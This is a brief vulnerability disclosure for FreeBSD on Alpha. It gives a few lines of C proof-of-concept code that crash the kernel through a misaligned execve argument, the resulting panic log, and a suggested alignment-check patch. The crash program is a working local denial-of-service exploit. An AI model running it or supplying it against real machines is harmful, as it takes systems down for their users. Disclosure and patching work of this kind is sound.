FreeBSD Local DoS Exploit
/*
* FreeBSD/Alpha local DoS
* by Marceta Milos
* root@marcetam.net
*
*/
char main()
{
execve("/bin/ls",(int *)(main + 1), 0);
}
/* eof */
# gcc kernkill.c -o kk
#./kk
<I>fatal kernel trap:
trap entry = 0x4 (unaligned access fault)
cpuid = 0
faulting va = 0x120000891
opcode = 0x29
register = 0x0
pc = 0xfffffc0000651bf0
ra = 0xfffffc00004900e0
sp = 0xfffffe0039c3f840
usp = 0x11fffae0
curthread = 0xfffffc00620a3720
pid = 713, comm = kk
panic: trap
cpuid = 0;
syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231
231 231
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231
giving up on 141 buffers
Uptime: 13m13s
Automatic reboot in 15 seconds - press a key on the console to abort
Rebooting...
Workaround:
You may make a proper use of ALIGNED_POINTER macro which already exists in
src/sys/alpha/include/param.h to check if ptrs are aligned, or make your
own like:
#define PTR_ALIGNED(x) (((x) & 0x7) == 0)
Putting the following line at the top of execve() in
src/sys/kern/kern_exec.c should prevent the crash (unfortunately, this is
not tested. Idea is Marceta Milos', a little corrected by Mr. Dag-Erling
Sm rgrav, FreeBSD deputy security officer):
if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))
return (EFAULT);
推荐
评论(0条)
